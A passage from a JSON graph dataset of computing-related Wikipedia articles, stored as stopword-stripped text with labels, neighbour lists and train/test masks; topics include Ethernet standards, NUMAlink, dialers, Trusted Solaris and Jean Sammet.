    "text": "IEEE_802.3:ieee 802.3 ieee 802.3 working group collection institute electrical electronics engineers ieee standards produced working group defining physical layer data link layer media access control mac wired ethernet generally local area network lan technology wide area network wan applications physical connections made nodes and/or infrastructure devices hubs switches routers various types copper fiber cable 802.3 technology supports ieee 802.1 network architecture 802.3 also defines lan access method using csma/cd",
    "neighbors": [
      8708,
      7045,
      9860,
      3847,
      7049,
      1297,
      7698,
      5118,
      5529,
      5531,
      2206,
      5671,
      9767,
      5291,
      172,
      4396,
      6187,
      816,
      434,
      3762,
      2998,
      3383,
      7865,
      11321,
      5437,
      5439,
      5185,
      3780,
      11332,
      7498,
      8266,
      9939,
      7258,
      10332,
      3040,
      2785,
      1893,
      4581,
      5863,
      4202,
      5875,
      7411,
      11125,
      6904,
      8828,
      3838,
      2431
    ],
    "mask": "None"
  },
  {
    "node_id": 5271,
    "label": 4,
    "text": "Virtual_private_database:virtual private database virtual private database vpd masks data larger database subset data appears exist without actually segregating data different tables schemas databases typical application constraining sites departments individuals etc operate records time allowing privileged users operations e.g reports data warehousing etc access whole table term typical oracle dbms implementation general tables associated sql functions return predicate sql expression whenever query executed relevant predicates involved tables transparently collected used filter rows select insert update delete different rules",
    "neighbors": [
      2369,
      1314,
      10340,
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 5272,
    "label": 3,
    "text": "NUMAlink:numalink numalink system interconnect developed silicon graphics sgi use distributed shared memory ccnuma computer systems numalink originally developed sgi origin 2000 onyx2 systems time systems introduction branded craylink sgi brief ownership cray research hewlett packard enterprise entered original equipment manufacturer oem arrangement silicon graphics international sgi use numalink foundation mission critical servers numalink 1 sgi engineers deemed system interconnect used stanford dash first generation numalink interconnect numalink 2 branded craylink second generation interconnect announced october 1996 used onyx2 visualization systems origin 200 origin 2000 servers supercomputers numalink 2 interface hub asic numalink 2 capable 1.6 gb/s peak bandwidth two 800 mb/s pecl 400 mhz 16-bit unidirectional links numalink 3 third generation interconnect introduced 2000 used origin 3000 altix 3000 numalink 3 capable 3.2 gb/s peak bandwidth two 1.6 gb/s unidirectional links name numaflex used modular design approach around time numalink 4 fourth generation interconnect introduced 2004 used altix 4000 numalink 4 capable 6.4 gb/s peak bandwidth two 3.2 gb/s unidirectional links numalink 5 fifth generation interconnect introduced 2009 used altix uv series numalink 5 capable 15 gb/s peak bandwidth two 7.5 gb/s unidirectional links numalink 6 sixth generation interconnect introduced 2012 used sgi uv 2000 sgi uv 3000 sgi uv 30 numalink 6 capable 6.7 gb/s bidirectional peak bandwidth 256 socket system 64tb coherent shared memory numalink 7 seventh generation interconnect introduced 2014 used hpe integrity mc990 x/sgi uv 300 sgi uv 30ex sgi uv 300h sgi uv 300rl numalink 7 capable 14.94 gb/s bidirectional peak bandwidth 64 socket system 64tb coherent shared memory numalink 8 eighth generation interconnect introduced 2017 used hpe superdome flex numalink 8 capable 853.33 gb/s bisection peak bandwidth 64 links cut 32 socket system 48tb coherent shared memory",
    "neighbors": [
      5380,
      7942,
      5898,
      7311,
      5523,
      5156,
      426,
      3764,
      11447,
      7234,
      10051,
      6858,
      9932,
      5076,
      2264,
      7001,
      221,
      6243,
      1638,
      5356,
      1398,
      1149
    ],
    "mask": "Test"
  },
  {
    "node_id": 5273,
    "label": 7,
    "text": "IBM_Intelligent_Cluster:ibm intelligent cluster ibm intelligent cluster cluster solution high-performance computing composed primarily ibm system x ibm bladecenter ibm system storage components integrated network switches various vendors optional high-performance infiniband interconnects solution previously known ibm system cluster 1350 eserver cluster 1350 simply e1350 roughly twice year solution components updated include then-current products ibm vendors solution predated eserver cluster 1300 e1300 based then-current pentium iii processors introduced november 2001 replaced e1350 october 2002 introduction pentium 4-based intel xeon processors operating system choices officially limited enterprise linux distributions red hat suse microsoft windows hpc server 2008 systems management ibm offered xcat additional software gpfs loadleveler could also ordered ibm intelligent cluster systems integrated factory-built tested cluster solutions comprehensive warranty service components including third-party options system could comprise traditional rack-optimized nodes well ibm bladecenter idataplex nodes processor choices intel xeon amd opteron processors along integrated storage switches provide turnkey linux microsoft cluster environment",
    "neighbors": [
      6597,
      3791,
      9455,
      6677,
      1115,
      7615
    ],
    "mask": "Test"
  },
  {
    "node_id": 5274,
    "label": 2,
    "text": "Nokia_N85:nokia n85 nokia n85 high-end smartphone produced nokia announced 27 august 2008 part nseries line n85 runs symbian os v9.3 s60 3rd edition platform feature pack 2 released october retailing 450 euros taxes major feature n85 introduced amoled display giving brighter sharper colours n85 dual-slider like nokia n95 access either media playback buttons numeric keypad 25 slimmer size upper sliding keys illuminate four multimedia keys music video playback two gaming keys playing n-gage 2.0 games also navi wheel like nokia n81 replaced bases design well gps receiver 5-megapixel camera dual led flash fm transmitter n85 well received decent upgrade n95 well better actual flagship nokia n96 costed 100 euros additions somewhat critically negative compared n96 n85 thinner lighter camera lens cover larger battery capacity usb charging via microusb port amoled screen although without large internal memory dvb-h receiver two-way slider spring assistance mechanism optional dvb-h nokia mobile tv receiver su-33w possible watch television screen phone",
    "neighbors": [
      1537,
      4609,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      8472,
      5019,
      5659,
      669,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      9262,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 5275,
    "label": 3,
    "text": "SWIV:swiv swiv 2d vertically scrolling shoot 'em game originally released 1991 commodore amiga atari st commodore 64 zx spectrum amstrad cpc home computer formats converted game boy color 2001 game considered spiritual successor tecmo arcade game silkworm sales curve previously converted home computer formats 1989 game heritage evident game design whereby one player pilots helicopter armoured jeep swiv official sequel noted ex-sales curve producer dan marchant swiv n't really sequel silkworm certainly inspired several shoot-'em-ups played loved game amiga manual however explained swiv acronym special weapons interdiction vehicle also short silkworm iv even though silkworm ii iii swiv vertically scrolling shoot-em-up plays typical fashion games genre player chooses using either helicopter jeep beginning game plays chosen vehicles scrolling levels shooting oncoming enemies two players present vehicles used certain enemies shot drop shield power-ups either picked afford temporarily invincibility detonated destroy enemies onscreen every often boss enemy attack destruction bosses give upgrades player forward firing gun amiga version ’ cheat mode could activated typing ncc1701d title screen release swiv met positive reviews magazines time receiving 92 amiga format magazine 88 commodore format c64 version 91 amiga action 90 computer video games 90 sinclair game ranked 27th best game time amiga power swiv popular enough spawn direct sequel arrived super nes title super swiv later ported mega drive mega swiv 1997 sequel titled swiv 3d released making use 3d terrain models",
    "neighbors": [
      8709,
      4043,
      8492,
      9006,
      10862,
      4690,
      6390,
      9501,
      1693,
      4894
    ],
    "mask": "None"
  },
  {
    "node_id": 5276,
    "label": 3,
    "text": "Ceva_(semiconductor_company):ceva semiconductor company ceva publicly listed semiconductor intellectual property ip company headquartered mountain view california specializes digital signal processor dsp technology company main development facility located herzliya israel sophia antipolis france ceva recently named israeli 100 companies list technologies changed world ceva created november 2002 combination dsp ip licensing division dsp group parthus technologies plc irish company founded 1993 company develops semiconductor intellectual property core technologies multimedia wireless communications technology ceva claimed largest number baseband processors 2010 90 dsp ip market share 2011 july 2014 acquired rivierawaves sas private company based france",
    "neighbors": [
      10725,
      9042,
      9413,
      11094
    ],
    "mask": "Test"
  },
  {
    "node_id": 5277,
    "label": 9,
    "text": "Jean_E._Sammet:jean e. sammet jean e. sammet march 23 1928 – may 20 2017 american computer scientist developed formac programming language 1962 also one developers influential cobol programming language received b.a mathematics mount holyoke college 1948 m.a mathematics university illinois urbana-champaign 1949 received honorary d.sc mount holyoke college 1978 sammet employed sperry gyroscope 1955 1958 supervised first scientific programming group 1958 1961 worked sylvania staff consultant programming research member original cobol group joined ibm 1961 developed formac first widely used computer language symbolic manipulation mathematical formulas ibm researched use restricted english programming language use natural language mathematical programs programming technology planning manager federal systems division 1968 1974 appointed software technology manager 1979 sammet founded acm special interest committee symbolic algebraic manipulation sicsam 1965 chair special interest group programming languages sigplan first female president acm 1974 1976 jean e. sammet born march 23 1928 new york city jean sister helen born harry ruth sammet lawyers jean helen attended public elementary schools manhattan sammet strong interest mathematics unable attend bronx high school science accept girls instead sammet attended julia richman high school sammet chose enroll mount holyoke college based strength mathematics program sammet majored mathematics took education courses allowed certified teach high school mathematics new york minored political science graduating mount holyoke sammet pursued graduate studies university illinois received 1949 taking courses toward ph.d. teaching assistant mathematics department university illinois 1948 1951 sammet first encountered computer 1949 university illinois impressed considering obscene piece hardware 1951 sammet began looking position education sammet forced search positions new jersey new york city hiring new teachers authorities new jersey determined sammet missing two courses studies course education one history new jersey sammet fought determination stating knowledge new jersey history strengthen ability teach mathematics high school forced sammet seek types employment 1951 sammet took position metropolitan life insurance company trainee actuary agreed participate in-house training program learn punched card accounting machines sammet took electronic accounting machines unable work machines training complete left position insurance office enrolled columbia university pursue ph.d. mathematics sammet worked teaching assistant barnard college 1952-1953 school year decided academic life 1953 1958 sammet mathematician sperry gyroscope new york spent time working mathematical analysis problems clients ran analog computer sammet worked department navy ’ submarine program time early january 1955 sammet began life programmer sperry gyroscope working digital computer sperry electronic digital automatic computer speedac asked sammet programmer first task write basic loader speedac 20-line program took three days toggle computer hand binary sammet became group leader called “ open shop ” sperry began hiring programmers “ open shop ” consisted programmers acting consultants engineers involved scientists assisted writing testing routines group produced system software focused scientific engineering computations 1955 sperry gyroscope remington rand merged became sperry rand merger allowed sammet access univac computer grace hopper fall 1956 sammet taught one earliest graduate-level courses computer programming applied mathematics department adelphi college university long island despite fact adelphi computer textbooks programming existed time sammet able instruct two courses two years sammet decided leave sperry work company computers focal point classifieds time separated gender sammet unable find position woman field interested decided scan men ’ list found engineer position sylvania electric products needham massachusetts sammet instead hired oversee software development mobidic project carl hammer person responsible sylvania ’ software development 1959 sammet five programmers established much design influential cobol programming language proposal written span two weeks eventually accepted sylvania u.s. government clients around 1965 1966 sammet noticed need exchange intellectual information others working languages software worked formac member acm number years active became interested starting special interest group would allow speak professionals field couple failed attempts contacting person charge special interest groups special interest committees acm sammet contacted george forsythe president acm 1964 1966 named chairperson special interest committee symbolic algebraic manipulation order gain interest sicsam sammet wrote letters people identified publications happening field time identified people bell labs carnegie mellon ibm different divisions groups sammet faced resistance interest group numerical analysis acm roughly five years sicsam formed conference mathematical software called signum sammet states fought way give paper signum group interested non-numerical analysis kind activity assistance interested sicsam sammet organized conference held march 1966 symposium symbolic algebraic manipulation symsam june 1966 tony oettinger elected president acm sammet elected northeast regional representative 1966-1968 also member acm council acm lecturer 1967 1968 1972 bernie galler elected president acm 1968 august 1968 sammet became chairperson acm committee sigs sics 1971 elected chair sigplan served one year two-year term resigning elected vice president acm 1972 chairperson sigplan organized conferences sigplan various special interest groups sammet stated conferences organized based recognition fundamental programming languages different aspects within computing sammet served vice president acm june 1972 june 1974 working president acm time tony ralston sammet made finances acm priority time vice presidency acm almost bankrupt sammet convinced ralston hold member-office forum prior annual conference sammet encouraged based recognition acm realistic way communicating membership sammet died may 20 2017 silver spring maryland brief illness",
    "neighbors": [
      9889,
      4483,
      1864,
      2804,
      8502,
      4985,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 5278,
    "label": 0,
    "text": "Postmodernism_Generator:postmodernism generator postmodernism generator computer program automatically produces close imitations postmodernist writing written 1996 andrew c. bulhak monash university using dada engine system generating random text recursive grammars free version also hosted online essays produced formal grammar defined recursive transition network nassim nicholas taleb writes monte carlo generators 2001 book fooled randomness real instance reverse turing test human declared unintelligent writing told apart generated one mentioned biologist richard dawkins conclusion article postmodernism disrobed 1998 scientific journal nature reprinted book devil chaplain 2004",
    "neighbors": [
      1890,
      1652,
      10591,
      5098
    ],
    "mask": "None"
  },
  {
    "node_id": 5279,
    "label": 2,
    "text": "Immunix:immunix immunix discontinued commercial operating system provided host-based application security solutions last release immunix gnu/linux distribution version 7.3 november 27 2003 immunix inc. creator apparmor application security system may 10 2005 novell acquired immunix inc. long-time partner novell apparmor one novell primary interests result adopted company renamed novell apparmor powered immunix september 2007 novell laid apparmor team",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      7983,
      9646,
      2738,
      4790,
      823,
      439,
      56,
      59,
      7483,
      3903,
      4673,
      2375,
      4039,
      8907,
      1110,
      9693,
      6625,
      2914,
      6754,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      5363,
      9461,
      6393,
      11388,
      8957,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 5280,
    "label": 2,
    "text": "Trusted_Solaris:trusted solaris trusted solaris discontinued security-evaluated operating system based solaris sun microsystems featuring mandatory access control model trusted solaris 8 common criteria certified evaluation assurance level eal4+ capp rbacpp lspp protection profiles basis dodiis trusted workstation program features previously available trusted solaris fine-grained privileges part standard solaris release solaris 10 11/06 update new component called solaris trusted extensions introduced making longer necessary different release modified kernel labeled security environments solaris trusted extensions opensolaris project solaris trusted extensions enabled enforces mandatory access control policy aspects operating system including device access file networking print window management services achieved adding sensitivity labels objects thereby establishing explicit relationships objects appropriate explicit authorization allows applications users read and/or write access objects component also provides labeled security features desktop environment apart extending support common desktop environment trusted solaris 8 release delivered first labeled environment based gnome solaris trusted extensions facilitates access data multiple classification levels single desktop environment solaris trusted extensions also implements labeled device access labeled network communication commercial internet protocol security option cipso standard cipso used pass security information within labeled zones solaris trusted extensions complies federal information processing standards fips",
    "neighbors": [
      2179,
      8077,
      4239,
      2967,
      6049,
      6445,
      9646,
      7983,
      10036,
      9665,
      8904,
      10962,
      11363,
      366,
      381,
      11506,
      5240,
      4858,
      125,
      9343
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5281,
    "label": 4,
    "text": "Dialer:dialer dialer american english dialler british english electronic device connected telephone line monitor dialed numbers alter seamlessly provide services otherwise require lengthy national international access codes dialed dialer automatically inserts modifies numbers depending time day country area code dialed allowing user subscribe service providers offer best rates example dialer could programmed use one service provider international calls another cellular calls process known prefix insertion least cost routing line powered dialer need external power instead takes power needs telephone line another type dialer computer program creates connection internet another computer network analog telephone integrated services digital network isdn many operating systems already contain program connections point-to-point protocol ppp wvdial many internet service providers offer installation cds simplify process setting proper internet connection either create entry os dialer install separate dialer aol software recent years term dialer often refers specifically dialers connect without user full knowledge cost creator dialer intending commit fraud call centers several dialling modes depending call placed 'manual dialing refers calls placed manually agent 4 different dialing modes depending software dialers selects contacts going called starts making calls automated dialers sold noble systems avaya convoso formerly safesoft solutions place calls using *preview* *power* auto dialing predictive dialing dialing modes defined according campaign type business preview dialing enables agents first view available information customer decide place call addition information customer agents may also view history customer contact center viewing information customer agent requests system make call example preview dialing useful debt collection campaigns allow agents view information customer define strategy starting talk customer system delivers preview calls agents automatically taking account priority call skills agent handle call preview dialing keeps agents dialing calls manually power dialer similar autodialer software enables telemarketers sales teams call centers dial list phone numbers automatically completely hands-free thus saving valuable time energy would otherwise wasted dialing hand predictive dialing state-of-the-art pacing mode used call large number customers within short period time predictive dialing optimizes time agents reducing idle times connected calls freeing agents dialing calls predictive dialing gathers statistics concerning duration calls long takes calls answered often calls answered agent become idle system places several calls predictive dialing campaigns achieve agent productivity 50 minutes per hour nuisance ratios 3 less system continually updating predictive dialing probabilities monitoring nuisance ratios performance compliance legislation example predictive dialing useful sales campaigns call large number contacts maximizing working time agents performance predictive dialing takes consideration accuracy contact lists policies nuisance calls contact list poor performance predictive dialing campaign risk agents connected live contacts able business power ivr used deliver pre-recorded message large call list call answered power ivr play audio file collect touch tone key responses speech command end message transfer call agent remove caller call list words ivr technology allows computer interact humans use voice dtmf tones input via keypad voice drop power ivr except wait touch tone key responses speech command end message playing message call dropped mostly used payment reminders similar dialers necessary connect internet least non-broadband connections dialers designed connect premium-rate numbers providers dialers often search security holes operating system installed user computer use set computer dial number make money calls alternatively dialers inform user promise special content accessible via special number examples content include software download usually illegal trojans posing mp3s trojans posing pornography 'underground programs cracks keygens cost setting service relatively low amounting thousand dollars telecommunications equipment whereupon unscrupulous operator typically take 90 cost premium rate call overheads users dsls similar broadband connections usually affected dialer downloaded installed dialing possible regular phone numbers dsl network users typically dial-up modem connected phone line however isdn adapter additional analog modem installed dialer might still able get connection malicious dialers identified following characteristics computers running microsoft windows without anti-virus software proper updates could vulnerable visual basic-scripts install trojan horse changes values windows registry sets internet explorer security settings way activex controls downloaded internet without warning change made user accesses malicious page email message start installing dialer script also disables modem speaker messages normally come dialing network users microsoft office outlook outlook express internet explorer especially affected running activex controls javascript allowed latest security patches microsoft installed march 2004 malicious dialers could installed fake anti-virus software e-mail spam so-called antivirus team example contained download links programs named downloadtool.exe antivirus.exe malicious dialers ways transmission include electronic greeting cards link pages tricks user install activex controls turn install dialers background therefore links spam emails never opened automatically started downloads canceled soon discovered one check dial-up internet see whether displayed phone number unchanged another way protect oneself disable premium numbers one phone services course disables services one never run foreign code privileged environment unless source trustworthy also advisable protect oneself anti-malware programs 15 august 2003 new law came effect germany called gesetz zur bekämpfung des missbrauchs von 0 190er/ 0 900er mehrwertdiensterufnummern law combat misuse 0 190/ 0 900 value added service numbers law contains following regulations 4 march 2004 german federal supreme court karlsruhe decided fees usage dialers paid used without user knowledge december 2016 ofcom office communications announced changes call centre regulations focused persistent use dialers make call residential telephone numbers also added extra clarity call centres approach issue silent abandoned calls ofcom also regulate abandoned call messages work message state company name reason calling importantly used opportunity market business",
    "neighbors": [
      3072,
      5250,
      6786,
      5764,
      7044,
      3462,
      10245,
      10756,
      9227,
      9356,
      9102,
      7441,
      8978,
      4863,
      4883,
      4245,
      278,
      9233,
      10392,
      1690,
      3867,
      9242,
      10141,
      9761,
      2213,
      5926,
      8998,
      9256,
      10026,
      9771,
      300,
      7983,
      1970,
      2611,
      4023,
      6712,
      10297,
      3643,
      6588,
      7739,
      9791,
      1088,
      3395,
      8387,
      4165,
      2508,
      847,
      3032,
      4314,
      7515,
      4344,
      1121,
      9187,
      11621,
      488,
      107,
      877,
      6382,
      10989,
      8432,
      117,
      9591,
      3320,
      2041,
      5245,
      1279
    ],
    "mask": "Test"
  },
  {
    "node_id": 5282,
    "label": 4,
    "text": "Dave_Aitel:dave aitel dave aitel computer security professional joined nsa research scientist aged 18 worked six years employed consultant stake three years 2002 founded security software company immunity cto aitel co-authored several books also well known writing several security tools dave aitel infrequent guest fox news channel provides commentary information security news",
    "neighbors": [
      5512,
      7887,
      9488,
      2262,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 5283,
    "label": 7,
    "text": "CaBIG:cabig cancer biomedical informatics grid cabig us government program develop open-source open access information network called cagrid secure data exchange cancer research initiative developed national cancer institute part national institutes health maintained center biomedical informatics information technology cbiit 2011 report cabig raised significant questions effectiveness oversight budget scope significantly trimmed may 2012 national cancer informatics program ncip created cabig successor program national cancer institute nci united states funded cancer biomedical informatics grid cabig initiative spring 2004 headed kenneth buetow goal connect us biomedical cancer researchers using technology known grid computing program led center bioinformatics information technology cbiit began 3-year pilot phase pilot phase concluded march 2007 trial announced buetow promoted program 2008 addition cagrid underlying infrastructure data sharing among organizations cabig developed software tools data sharing policies common standards vocabularies facilitate data sharing software tools targeted cabig sought provide foundational technology approach biomedicine called “ learning healthcare system. ” relies rapid exchange information among sectors research care researchers clinicians able collaboratively review accurately incorporate latest findings work ultimate goal speed biomedical research process also promoted often called personalized medicine cabig technology used adaptive clinical trials investigation serial studies predict therapeutic response imaging molecular analysis 2 i-spy2 designed use biomarkers determine appropriate therapy women advanced breast cancer health information technology hit promoted management secure exchange medical information among researchers health care providers consumers hit initiatives mentioning cabig nci american society clinical oncology initiated collaboration create oncology-specific electronic health record system using cabig standards interoperability enable oncologists manage patient information electronic format accurately captures specific interventional issues unique oncology nationwide health information network initiative share patient clinical data across geographically disparate sources create electronically linked national health information exchange might somehow related big health consortium formed 2008 promote personalized medicine disbanded 2012 july 2009 cabig announced collaboration dr. susan love research foundation build online cohort women willing participate clinical trials called army women goal one million database december 2009 site launched 30,000 women men signed 2010 cancer genome atlas aimed characterize 10,000 tumors across least 20 cancers 2015. cabig provided connectivity data standards tools collect organize share analyze diverse research data database since 2007 nci worked uk national cancer research institute ncri two organizations shared technologies collaborative research secure exchange research data using cagrid ncri oncology information exchange onix web portal announced august 2009 onix shut march 2012 duke cancer institute used cabig clinical trials tools collaboration beijing cancer hospital peking university project intended connect 65 nci-designated cancer centers enable collaborative research participating institutions could either “ adopt ” cabig tools share data directly cagrid “ adapt ” commercial in-house developed software cabig-compatible cabig program developed software development kits sdks interoperable software tools instructions process adapting existing tools developing applications cabig-compatible enterprise support network program included domain-specific expertise support service providers third party organizations provide assistance contract-for-services basis web portal using liferay software available 2008 2013 since 2004 cabig program used open-source communities adapted public-private partnerships cabig program produced software contract software development teams largely within commercial research community general software developed us government contracts property us government us taxpayers depending terms specific contracts might accessible request freedom information act foia timeliness response requests might preclude requester ever gaining secondary value software released foia request cabig program placed cabig software software repository freely accessible download open source means anyone modify downloaded software however licensing applied downloaded software allows greater flexibility typical individual enterprise allowed contribute modified code back cabig program required likewise modifications made available open source required made available open source cabig licensing even allows use cabig applications components combined additions modifications released commercial products aspects cabig program actually encourage commercialization cabig technology 2008 glaxosmithkline announced would share cancer cell genomic data cabig private companies claimed benefits cabig technology 2010 cagrid community web site created 2007 1.x version core software added github project mid-2013 bsd 3-clause license used version 4.03 globus toolkit taverna workbench system manage workflow business process execution language software called introduce developed around 2006 contributors included ohio state university center clinical translational science private companies ekagra software technologies semantic bits 2008 questioned program benefiting large pharmaceutical companies 2011 project spent estimated 350 million although goal considered laudable much software unevenly adopted developed great expense compete commercial offerings march 2011 nci working group assessment concluded cabig ... expanded far beyond goals implement overly complex ambitious software enterprise nci-branded tools especially clinical trial management system ctms space produced limited traction cancer community compete established commercial vendors create financially untenable long-term maintenance support commitments nci 2012 nci announced new program national cancer informatics program ncip successor cabig cagrid computer network software supported cancer biomedical informatics grid cabig initiative national cancer institute us national institutes health cabig voluntary virtual informatics infrastructure connects data research tools scientists organizations 2013 national cancer informatics program ncip re-released cagrid bsd 3-clause license migrated source repository github cagrid uses version 4.03 globus toolkit produced globus alliance cagrid portal web-based application built liferay enables users discover interact services available cagrid infrastructure portal serves primary visualization tool cagrid middleware also served cabig information source cagrid portal users access information cabig participants cagrid points contact pocs cagrid-related news events cagrid workflow uses march 2011 nci published extensive review cabig nci cbiit program funded cagrid software development see included long list problems program recommended software development projects discontinued",
    "neighbors": [
      5956,
      2501,
      10020,
      5768,
      105,
      9320,
      5612,
      7983,
      10641,
      11221,
      11353,
      8122
    ],
    "mask": "None"
  },
  {
    "node_id": 5284,
    "label": 4,
    "text": "List_of_digital_forensics_tools:list digital forensics tools 1980s digital forensic investigations consisted live analysis examining digital media directly using non-specialist tools 1990s several freeware proprietary tools hardware software created allow investigations take place without modifying media first set tools mainly focused computer forensics although recent years similar tools evolved field mobile device forensics list includes notable examples digital forensic tools memory forensics tools used acquire analyze computer volatile memory ram often used incident response situations preserve evidence memory would lost system shut quickly detect stealthy malware directly examining operating system running software memory mobile forensics tools tend consist hardware software component mobile phones come diverse range connectors hardware devices support number different cables perform role write blocker computer devices software forensics science analyzing software source code binary code determine whether intellectual property infringement theft occurred centerpiece lawsuits trials settlements companies dispute issues involving software patents copyrights trade secrets software forensics tools compare code determine correlation measure used guide software forensics expert",
    "neighbors": [
      7426,
      5636,
      645,
      2437,
      10756,
      2824,
      778,
      268,
      5010,
      4500,
      5397,
      8469,
      10392,
      3099,
      7968,
      6177,
      9377,
      6443,
      11182,
      10290,
      4789,
      7605,
      823,
      2231,
      8119,
      8635,
      6588,
      2494,
      830,
      7618,
      8389,
      6472,
      7369,
      6475,
      10189,
      4049,
      3290,
      4956,
      4194,
      2275,
      4834,
      5475,
      7525,
      9319,
      2671,
      9458,
      7160,
      11642,
      10107,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 5285,
    "label": 3,
    "text": "Wavefront_Technologies:wavefront technologies wavefront technologies computer graphics company developed sold animation software used hollywood motion pictures industries founded 1984 santa barbara california bill kovacs larry barels mark sylvester started company produce computer graphics movies television commercials market software off-the-shelf computer animation tools available time 1995 wavefront technologies purchased kroyer films silicon graphics rhythm hues merged alias research form alias|wavefront wavefront developed first product preview first year business company production department helped tune software using commercial projects creating opening graphics television programs one first customers purchase preview universal studios television program knight rider early customers included nbc electronic arts nasa wavefront early animation software created bill kovacs jim keating john grower left robert abel associates roy hall others developed company flagship product wavefront advanced visualizer 1988 wavefront released personal visualizer desktop workstation interface high-end rendering software wavefront software developed silicon graphics computers later ported sun ibm hewlett-packard tektronix dec sony systems wavefront purchased silicon graphics first production workstation offer buy prototype given demo knocked back 1989 company released data visualizer early commercial tool scientific visualization 1991 wavefront introduced composer image manipulation product composer became standard 2d 3d compositing special effects feature films television 1992 wavefront released two new animation tools worked advanced visualizer kinemation character animation system used inverse kinematics natural motion dynamation tool interactively creating modifying particle systems realistic natural motion dream quest images used dynamation composer create 90 visual effects sequences film crimson tide 1994 year rival alias made deal nintendo wavefront partnered atari develop gameware game development software gameware exclusive graphics animation development system atari jaguar wavefront software used numerous major films including luxo jr. great mouse detective akira tin toy technological threat knick knack dogs go heaven rock-a-doodle outbreak aladdin true lies stargate electronic arts richard taylor said wavefront software beautifully designed even non-technical person could learn wavefront major reason cg took leap forward wavefront involved several mergers major computer graphics software companies 1980s 1990s 1988 wavefront acquired abel image research division robert abel associates founder bill kovacs previously worked acquisition partially financed belgian government following wavefront establishment office ghent association barco graphics kortrijk acquiring abel image research increased wavefront presence japan japanese conglomerate csk became part owner wavefront japan 1990 helping expand company asia wavefront acquired rival computer graphics company thomson digital images france 1993 tdi software featured innovations nurbs modeling interactive rendering company also extensive distribution channels europe asia february 7 1995 silicon graphics announced would purchase wavefront technologies alias research deal totaling approximately 500 million sgi merged two companies create alias|wavefront goal creating advanced digital tools combining companies strengths reducing duplication time merger wavefront market value 119 million 1994 revenues 28 million partially motivated merger microsoft purchase alias wavefront competitor softimage sgi saw microsoft entrance market threat merged alias wavefront compete microsoft alias owned autodesk softimage october 2008 1997 whilst working wavefront jim hourihan received academy award technical achievement creation dynamation bill kovacs roy hall received scientific engineering academy award 1998 work advanced visualizer 2003 alias|wavefront awarded academy award scientific technical achievement maya software created combination earlier software wavefront alias tdi",
    "neighbors": [
      9665,
      10051,
      5384,
      921,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 5286,
    "label": 6,
    "text": "JFFS:jffs journaling flash file system jffs log-structured file system use flash memory devices linux operating system superseded jffs2 flash memory specifically flash must erased prior writing erase process several limitations constraints combine produce profound asymmetry patterns read write access flash memory contrast magnetic hard disk drives offer nearly symmetrical read write access read speed write speed nearly identical constrained rate disk spins possible read write small blocks sectors typically 512 4096 bytes practical limit number times magnetic media written rewritten traditional file systems ext2 fat designed use magnetic media typically update data structures in-place data structures like inodes directories updated on-disk every modification concentrated lack wear-levelling makes conventional file systems unsuitable read-write use flash devices jffs enforces wear levelling treating flash device circular log changes files directories written tail log nodes node header containing metadata written first followed file data nodes chained together offset pointers header nodes start valid become obsolete newer version created free space remaining file system gap log tail head runs low garbage collector copies valid nodes head tail skips obsolete ones thus reclaiming space",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      5661,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      2304,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 5287,
    "label": 9,
    "text": "FastTrack_Scripting_Host:fasttrack scripting host fasttrack automation studio formerly known fasttrack scripting host – often referred fasttrack – scripting language windows system administrators product ’ goal handle kind scripting might required automate processes microsoft windows networks web site product located www.fasttrackscript.com fasttrack produced fasttrack software headquartered aalborg denmark product promoted manufacturer one-stop shop windows script writers development paradigm “ one operation one script line ” script writers use purpose-built editor create scripts inserting script lines via menus drag ’ n drop simply typing scripts may used box created scratch imported forums users customized product documentation simple scripts include advanced scripts include hood scripts comprise commands functions collections conditions script executed components converted many lines c code sometimes hundreds lines depending particular script operation scripts compiled exe files msi packages treated standalone windows applications fasttrack scripting host fasttrack first developed around 2006 ease administration burden system administrators windows networks idea product came founder president fasttrack software lars pedersen background systems administration previously telenor denmark ’ major telephone company pedersen performed various roles systems administration programming web development also worked consultant developer several major projects various companies europe dissatisfied experiences frustrations administering windows networks pederson looked way make life easier system 